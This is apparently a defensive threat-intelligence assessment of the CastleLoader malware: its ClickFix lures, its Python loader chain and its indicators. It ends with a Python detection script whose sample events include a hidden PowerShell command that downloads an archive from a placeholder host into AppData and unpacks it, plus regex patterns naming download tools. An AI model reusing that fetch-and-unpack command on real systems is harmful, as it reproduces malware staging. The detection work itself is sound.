CastleLoader Malware Uses ClickFix Prompts and Python Loader Chain
CORTEX Protocol Intelligence Assessment
Business Impact: ClickFix social engineering exploits user trust in legitimate CAPTCHA prompts to achieve initial access. Python-based loaders evade traditional antivirus detection. Corporate environments with Python installed for development work are primary targets. In-memory execution bypasses file-based detection.

Technical Context: CastleLoader uses ClickFix social engineering (T1204.002 User Execution: Malicious File) to execute PowerShell commands that download Python loader chains (T1059.001, T1059.006). Python bytecode reconstructs CastleLoader shellcode in memory (T1055 Process Injection), using PEB Walking for API resolution (T1106 Native API) and XOR decryption. The GoogeBot user agent and GitHub/Pastebin hosting make C2 traffic appear benign. The evolution from AutoIt to Python indicates adaptation to evade detection in dev-heavy environments.
Strategic Intelligence Guidance
- Add ClickFix-style prompts and Run dialog command abuse to user awareness training, emphasizing that staff should never execute instructions from unsolicited pop-ups or emails.
- Harden endpoints by restricting access to cmd.exe, PowerShell and Python interpreters for non-administrative users, and apply application control policies to block interpreters from unapproved paths.
- Tune EDR and SIEM detections for suspicious process chains involving conhost.exe, cmd.exe and pythonw.exe, especially when fetching archives and unpacking them into AppData.
- Monitor DNS and HTTP traffic for CastleLoader-linked indicators such as the GoogeBot user agent and suspicious /service/download/ paths, and block or sandbox traffic to newly registered domains used in the campaign.
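The process-chain and HTTP indicators in the two detection items above, turned into runnable scoring logic. This is an added example, not tooling from the assessment: the Sysmon-style event fields, the proxy log format and every sample value (hosts, paths, file names) are constructed assumptions.

```python
"""Score endpoint and proxy telemetry for the CastleLoader tradecraft named in
the assessment. Added example; field names and samples are assumptions."""
import re
from dataclasses import dataclass

# Paths the assessment calls out: archives unpacked into AppData, interpreter run from there.
APPDATA_RE = re.compile(r"(\\AppData\\|%APPDATA%|\$env:APPDATA)", re.IGNORECASE)
ARCHIVE_RE = re.compile(r"\.(zip|7z|rar)\b|Expand-Archive|tar\s+-x", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"curl|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.IGNORECASE)
CONSOLE = {"cmd.exe", "conhost.exe", "powershell.exe"}

@dataclass
class ProcEvent:
    parent: str   # parent image name (assumed Sysmon EID 1 style field)
    image: str    # child image name
    cmdline: str  # full command line

def score_process(ev: ProcEvent) -> list[str]:
    """Return the reasons a process-creation event matches the loader chain:
    a Python interpreter spawned by a console process and running from AppData,
    or a shell that fetches an archive and unpacks it into AppData."""
    reasons = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if image in {"pythonw.exe", "python.exe"} and parent in CONSOLE and APPDATA_RE.search(ev.cmdline):
        reasons.append("python-interpreter-from-appdata")
    if image in CONSOLE and DOWNLOAD_RE.search(ev.cmdline) and ARCHIVE_RE.search(ev.cmdline) \
            and APPDATA_RE.search(ev.cmdline):
        reasons.append("archive-fetch-into-appdata")
    return reasons

def score_http(line: str) -> list[str]:
    """Flag proxy log lines carrying the GoogeBot user agent or the /service/download/ path.
    Workstations never legitimately send a crawler user agent outbound, so the (misspelled)
    string is a high-confidence match on its own."""
    reasons = []
    if "GoogeBot" in line:
        reasons.append("googebot-user-agent")
    if "/service/download/" in line:
        reasons.append("service-download-path")
    return reasons

SAMPLE_PROCS = [  # constructed events, not real telemetry
    ProcEvent("explorer.exe", "powershell.exe",   # Run-dialog style launch fetching an archive
              r'powershell -w hidden -c "curl -o $env:APPDATA\u.zip https://example.invalid'
              r'/service/download/u.zip; Expand-Archive $env:APPDATA\u.zip $env:APPDATA"'),
    ProcEvent("cmd.exe", "pythonw.exe", r'"C:\Users\u\AppData\Local\py\pythonw.exe" main.py'),
    ProcEvent("explorer.exe", "pythonw.exe", r'"C:\Program Files\Python312\pythonw.exe" build.py'),
]
SAMPLE_HTTP = [  # constructed proxy lines, not real telemetry
    '10.0.0.5 GET http://example.invalid/service/download/stage2 "GoogeBot"',
    '10.0.0.6 GET https://pypi.org/simple/requests/ "pip/24.0"',
]
```

The third process sample (a developer's interpreter under Program Files) scores nothing, which is the distinction the guidance on dev-heavy environments needs.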